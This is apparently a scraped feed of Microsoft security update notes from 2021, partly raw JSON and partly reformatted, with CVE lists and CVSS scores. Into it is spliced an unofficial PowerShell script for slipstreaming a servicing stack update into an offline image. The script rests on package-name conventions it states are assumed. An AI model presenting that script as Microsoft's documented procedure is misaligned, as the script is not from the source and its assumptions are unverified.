For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005633>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005633](<https://download.microsoft.com/download/4/7/d/47d2fcaf-120b-46c1-8097-ecef0fae961f/5005633.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005633 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005633", "href": "https://support.microsoft.com/en-us/help/5005633", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:19", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004289](<https://support.microsoft.com/help/5004289>) (released July 13, 2021) and addresses the following issues:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. 
If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005392](<https://support.microsoft.com/help/5005392>).\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**How to get this update****Symptom **| **Workaround ** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. 
Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. 
Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. 
To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005088>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005088](<https://download.microsoft.com/download/5/1/c/51cfa686-f644-4875-b76b-610d21809361/5005088.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005088 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005088", "href": "https://support.microsoft.com/en-us/help/5005088", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:17", "description": "None\n**6/15/21 \nIMPORTANT **This 
release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).

**11/17/20** For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). **Note** Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.

## Highlights

 * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>).

## Improvements and fixes

### Windows 10, version 21H1

This security update includes quality improvements. Key changes include:

 * This build includes all the improvements from Windows 10, version 2004.
 * No additional issues were documented for this release.

### Windows 10, version 20H2

This security update includes quality improvements. Key changes include:

 * This build includes all the improvements from Windows 10, version 2004.
 * No additional issues were documented for this release.

### Windows 10, version 2004

**Note:** This release also contains updates for Microsoft HoloLens (OS Build 19041.1159) released August 10, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens devices that have not updated to this most recent OS Build.

This security update includes quality improvements. Key changes include:

 * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.

If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.

**Windows Update Improvements** Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.

### Windows 10 servicing stack update - 19041.1161, 19042.1161, and 19043.1161

 * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.

## Known issues in this update

**Symptom:** When using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually. **Note** The affected apps are using the **ImmGetCompositionString()** function.

**Workaround:** This issue is resolved in KB5005101.

**Symptom:** Devices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later. **Note** Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.

**Workaround:** To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:

 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**
 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**
 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.

If you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>).

**Symptom:** After installing the June 21, 2021 (KB5003690) update, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, "PSFX_E_MATCHING_BINARY_MISSING".

**Workaround:** For more information and a workaround, see KB5005322.

**Symptom:** After installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).

**Workaround:** This behavior is expected because we addressed the issue in CVE-2021-36942. **Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support.

## How to get this update

**Before installing this update** Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.

**Prerequisite:** For Windows Server Update Services (WSUS) deployment or when installing the standalone package from Microsoft Update Catalog: if your devices do not have the May 11, 2021 update (KB5003173) or a later LCU, you **must** install the special standalone August 10, 2021 SSU (KB5005260).

**Install this update**

| Release Channel | Available | Next Step |
|---|---|---|
| Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update. |
| Windows Update for Business | Yes | None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. |
| Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005033>) website. |
| Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure **Products and Classifications** as follows. **Product**: Windows 10, version 1903 and later. **Classification**: Security Updates |

**If you want to remove the LCU** To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**. Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall** switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.

**File information** For a list of the files that are provided in this update, download the [file information for cumulative update 5005033](<https://download.microsoft.com/download/1/e/e/1eeb7268-cb6a-4865-a98b-9c51f0ec7beb/5005033.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1161, 19042.1161, and 19043.1161](<https://download.microsoft.com/download/f/7/4/f74513f3-7838-4538-89f5-8be86d571826/SSU_version_19041_1161.csv>).
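The slipstream workaround in this article gives the two `expand` steps but leaves "slipstream this file into your offline image first, then the LCU" and the later `DISM /online /get-packages` lookup as prose. The PowerShell below is an added example, not part of the KB article and not Microsoft's own tooling: it extracts the SSU cab from the combined package, applies it to a mounted WIM before the LCU, confirms both packages landed, and discards the mount rather than saving a half-patched image if either step fails. It assumes an elevated session with `expand.exe` and the DISM PowerShell module, uses the article's KB5000842 file names as the example package, and `$WimPath`, `$ImageIndex` and `$MountDir` are placeholders for your own image. The `Get-LcuPackageName` helper at the end is the cmdlet form of the `DISM /online /get-packages` step for the removal note; the `Package_for_RollupFix` and `Package_for_ServicingStack` prefixes it filters on are assumed from how DISM names those packages and are not stated in the article.

```powershell
# Added example, not from the KB article: extract the SSU from a combined SSU+LCU .msu
# and slipstream it into an offline image ahead of the LCU, as the workaround requires.
# Needs an elevated session with expand.exe and the DISM PowerShell module.
param(
    [string]$Msu        = 'Windows10.0-KB5000842-x64.msu',   # the article's example package
    [string]$WorkDir    = (Join-Path $env:TEMP 'ssu-extract'),
    [string]$WimPath    = 'D:\sources\install.wim',          # placeholder: your offline image
    [int]   $ImageIndex = 1,                                 # placeholder: image index inside the WIM
    [string]$MountDir   = 'C:\mount'                         # placeholder: an empty mount folder
)
$ErrorActionPreference = 'Stop'
New-Item -ItemType Directory -Force -Path $WorkDir, $MountDir | Out-Null

# Step 1 (article): pull the outer .cab out of the .msu.
$outerCab = [System.IO.Path]::ChangeExtension((Split-Path -Path $Msu -Leaf), '.cab')
& expand.exe $Msu "/f:$outerCab" $WorkDir | Out-Null
if ($LASTEXITCODE -ne 0) { throw "expand.exe failed on $Msu (exit code $LASTEXITCODE)" }

# Step 2 (article): expand that cab; the SSU is the nested SSU-<build>-<arch>.cab.
& expand.exe (Join-Path $WorkDir $outerCab) '/f:*' $WorkDir | Out-Null
if ($LASTEXITCODE -ne 0) { throw "expand.exe failed on $outerCab (exit code $LASTEXITCODE)" }

# Step 3 (article): find the SSU cab. Stop here rather than slipstreaming the LCU alone,
# which is exactly the ordering that triggers the Edge Legacy known issue.
$ssuCab = Get-ChildItem -Path $WorkDir -Filter 'SSU-*.cab' | Select-Object -First 1
if (-not $ssuCab) { throw "No SSU-*.cab found under $WorkDir; is $Msu a combined SSU+LCU package?" }

# Slipstream: SSU first, then the LCU (the original .msu). Save the image only if both
# packages applied; otherwise discard the mount so no half-patched WIM is left behind.
Mount-WindowsImage -ImagePath $WimPath -Index $ImageIndex -Path $MountDir | Out-Null
$saved = $false
try {
    Add-WindowsPackage -Path $MountDir -PackagePath $ssuCab.FullName | Out-Null
    Add-WindowsPackage -Path $MountDir -PackagePath $Msu | Out-Null
    # Confirm both landed. Assumed DISM naming: the servicing stack and the rollup
    # packages carry these prefixes in their package names.
    Get-WindowsPackage -Path $MountDir |
        Where-Object { $_.PackageName -like 'Package_for_ServicingStack*' -or
                       $_.PackageName -like 'Package_for_RollupFix*' } |
        Select-Object -Property PackageName, PackageState
    Dismount-WindowsImage -Path $MountDir -Save | Out-Null
    $saved = $true
} finally {
    if (-not $saved) { Dismount-WindowsImage -Path $MountDir -Discard | Out-Null }
}

# The "DISM /online /get-packages" lookup from the removal note, as a cmdlet: on a running
# system the LCU is the RollupFix package, and its name is what Remove-WindowsPackage takes.
# The SSU itself cannot be removed once installed, so only the rollup is returned.
function Get-LcuPackageName {
    Get-WindowsPackage -Online |
        Where-Object { $_.PackageName -like 'Package_for_RollupFix*' } |
        Sort-Object -Property PackageName -Descending |
        Select-Object -First 1 -ExpandProperty PackageName
}
# Remove-WindowsPackage -Online -PackageName (Get-LcuPackageName) -NoRestart
```

The mount is discarded on any failure because `Add-WindowsPackage` of the LCU can fail part-way and `Dismount-WindowsImage -Save` would then commit a servicing stack that does not match the image's component store; rerun after fixing the cause rather than resuming.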
*Feed record for the KB5005033 entry above:* id KB5005033 (type mskb, bulletin family microsoft); title "August 10, 2021—KB5005033 (OS Builds 19041.1165, 19042.1165, and 19043.1165)"; published and modified 2021-08-10; source https://support.microsoft.com/en-us/help/5005033; CVEs CVE-2021-34481, CVE-2021-36942, CVE-2021-36948. Scores as assigned by the feed to the update as a whole: CVSS v3.1 9.8 Critical, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (exploitability 3.9, impact 5.9); CVSS v2 7.5 High, vector AV:N/AC:L/Au:N/C:P/I:P/A:P (exploitability 10.0, impact 6.4).

**Feed entry: August 10, 2021—KB5005090 (Monthly Rollup)** (last seen in the feed 2023-05-19T10:52:20)

**Important:** Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as "C" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the "B" or Update Tuesday release).

Verify that you have installed the required updates listed in the **How to get this update** section before installing this update.

For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).

## **Improvements and fixes**

This security update includes improvements and fixes that were a part of update [KB5004305](<https://support.microsoft.com/help/5004305>) (released July 13, 2021) and addresses the following issues:

 * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.
 * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005390](<https://support.microsoft.com/help/5005390>).
 * This update also contains miscellaneous security improvements to internal OS functionality.

For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.

## **Known issues in this update**

**Symptom:** After installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).

**Workaround:** This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>). **Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support.

**Symptom:** After installing this update and restarting your device, you might receive the error, "Failure to configure Windows updates. Reverting Changes. Do not turn off your computer", and the update might show as **Failed** in **Update History**.

**Workaround:** This is expected in the following circumstances:

 * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).
 * If you do not have an ESU MAK add-on key installed and activated.

If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the "How to get this update" section of this article.

**Symptom:** Certain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, "STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)". This occurs when you perform the operation on a CSV owner node from a process that doesn't have administrator privilege.

**Workaround:** Do one of the following:

 * Perform the operation from a process that has administrator privilege.
 * Perform the operation from a node that doesn't have CSV ownership.

Microsoft is working on a resolution and will provide an update in an upcoming release.

## **How to get this update**

**Before installing this update**

**IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020. For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).

**Prerequisite:** You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.

 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.
 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).
 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for the ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).

After installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).

**Install this update**

| Release Channel | Available | Next Step |
|---|---|---|
| Windows Update and Microsoft Update | Yes | None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. |
| Microsoft Update Catalog | Yes | To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005090>) website. |
| Windows Server Update Services (WSUS) | Yes | This update will automatically sync with WSUS if you configure **Products and Classifications** as follows. **Product**: Windows Server 2008 Service Pack 2. **Classification**: Security Updates |

## **File information**

For a list of the files that are provided in this update, download the [file information for update 5005090](<https://download.microsoft.com/download/3/e/d/3ed5bcad-9cd8-4084-860a-0eeff78ed341/5005090.csv>).

*Feed record for this entry:* id KB5005090 (type mskb, bulletin family microsoft); title "August 10, 2021—KB5005090 (Monthly Rollup)"; published and modified 2021-08-10; source https://support.microsoft.com/en-us/help/5005090; CVEs CVE-2021-34481, CVE-2021-36937, CVE-2021-36942. Scores as assigned by the feed to the rollup as a whole: CVSS v3.1 9.8 Critical, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (exploitability 3.9, impact 5.9); CVSS v2 7.5 High, vector AV:N/AC:L/Au:N/C:P/I:P/A:P (exploitability 10.0, impact 6.4).

**Feed entry: Windows 7 SP1 and Windows Server 2008 R2 SP1 update** (last seen in the feed 2023-05-19T10:52:19; the record is cut off below before its title and KB number)

**Important:** Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support.
Starting in July 2020, there will no longer be optional, non-security releases (known as "C" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the "B" or Update Tuesday release).

Verify that you have installed the required updates listed in the **How to get this update** section before installing this update.

For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).

## **Improvements and fixes**

This security update includes quality improvements. Key changes include:

 * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.
 * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005392](<https://support.microsoft.com/help/5005392>).
 * This update also contains miscellaneous security improvements to internal OS functionality.

